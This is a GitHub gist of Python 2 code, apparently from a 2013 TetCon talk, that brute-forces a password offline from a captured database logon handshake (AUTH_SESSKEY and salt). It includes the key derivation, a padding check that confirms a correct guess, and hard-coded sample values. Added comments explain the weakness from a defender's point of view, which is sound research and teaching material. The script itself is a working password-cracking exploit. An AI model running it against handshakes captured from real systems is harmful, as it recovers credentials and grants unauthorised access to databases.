Created
January 14, 2013 23:35
TetCon_2013_Stealth.Password.Cracking
from Crypto.Cipher import AES | |
from hashlib import * | |
from itertools import * | |
from sys import * | |
# NOTE(review): despite the name, 24 matches the length of the AES key built
# in decode() (20-byte SHA-1 digest + 4 zero bytes), not the 16-byte AES
# block size. The constant is not referenced anywhere in the visible code.
AES_BLOCK_SIZE = 24
# Hex form of eight 0x08 bytes: the padding that is_valid_sess_key() expects
# at the end of a correctly decrypted session key.
VALID_PADDING = '08' * 8
# All-zero 16-byte IV handed to AES-CBC in decode().
# Python 2 only: str.decode('hex') does not exist on Python 3.
IV = ('00' * 16).decode ('hex')
# Candidate alphabet: the 26 lowercase letters plus digits. The order of the
# characters fixes the order in which brute_force() enumerates candidates.
CHARACTER_SET = 'abcdefghijklmnopqrstxyzuvw0123456789'
# Inclusive bounds on the candidate password length tried by brute_force().
MIN_LENGTH = 1
MAX_LENGTH = 8
def decode (plainPwd, authSessKey, salt):
    """Decrypt a captured session key with a key derived from one password guess.

    plainPwd    -- candidate password (Python 2 byte string)
    authSessKey -- hex string of the encrypted session key
    salt        -- hex string of the salt sent alongside it

    Returns the decrypted session key as a hex string. Python 2 only
    (relies on str.decode('hex') / str.encode('hex')).

    Defensive note: the key is a single SHA-1 over password + salt with no
    work factor, so every guess costs one hash and one short AES decrypt.
    That is why a recorded handshake has to be treated as credential
    material, and why short passwords from a small alphabet give no margin.
    """
    saltBytes = salt.decode ('hex')
    # digest() yields the same 20 raw bytes as hexdigest().decode('hex').
    digest = sha1 (plainPwd + saltBytes).digest()
    # Zero-extend the 20-byte digest to a 24-byte AES-192 key.
    aesKey = digest + '\x00' * 4
    cipher = AES.new (aesKey, AES.MODE_CBC, IV)
    cipherBytes = authSessKey.decode ('hex')
    return cipher.decrypt (cipherBytes).encode ('hex')
def is_valid_sess_key (sessionKey):
    """Return True when the hex-encoded plaintext ends in the expected padding.

    VALID_PADDING is 16 hex characters (eight 0x08 bytes), so this checks
    only the last 8 bytes of the decrypted value. A wrong key produces that
    tail by chance with probability of roughly 2**-64, which is what makes
    the padding usable as an offline correctness check without contacting
    the server again.
    """
    return sessionKey.endswith (VALID_PADDING)
# Sample handshake values hard-coded by the author: a 48-byte (96 hex chars)
# encrypted session key and a 10-byte (20 hex chars) salt. Per the trailing
# comments they are the AUTH_SESSKEY and AUTH_VFR_DATA fields.
# NOTE(review): those field names match an Oracle database logon exchange;
# confirm against the talk this gist accompanies.
# Defensive point: decode() needs nothing beyond these two server-sent values
# to test a guess, so no failed-login event is produced while guessing.
# Detection has to focus on who can observe or request the handshake, not on
# authentication failures.
authSessKey = 'FBA388EBDB32734E0EB40AF6DB2759AA4035928DF0CA71CEE6637D8E9FEFAEA0D8E45BA9508F7668927CC9478558BAA5' # == AUTH_SESSKEY
salt = '505CF1E6D02DE8374D78' # == AUTH_VFR_DATA
def brute_force():
    """Enumerate every CHARACTER_SET string of length MIN_LENGTH..MAX_LENGTH.

    Each candidate is run through decode() against the module-level
    authSessKey and salt. The first one whose plaintext passes
    is_valid_sess_key() is printed and the process exits with status 0.
    Returns None if the space is exhausted without a match. Python 2 only
    (print statement, xrange).

    Nothing in the visible source calls this function.

    Defensive note: the search space is 36 symbols and at most 8 characters,
    which illustrates how little protection a short lowercase-and-digits
    password gives once the handshake values are known.
    """
    alphabet = list (CHARACTER_SET)
    for size in xrange (MIN_LENGTH, MAX_LENGTH + 1):
        print "Trying with password length: " + str (size)
        for combo in product (alphabet, repeat = size):
            candidate = ''.join (combo)
            sessKeyHex = decode (candidate, authSessKey, salt)
            if not is_valid_sess_key (sessKeyHex):
                continue
            print "Find OUT!"
            print "Decoded Auth session key: " + sessKeyHex
            print "Password: " + candidate
            # exit comes from `from sys import *`, i.e. sys.exit.
            exit(0)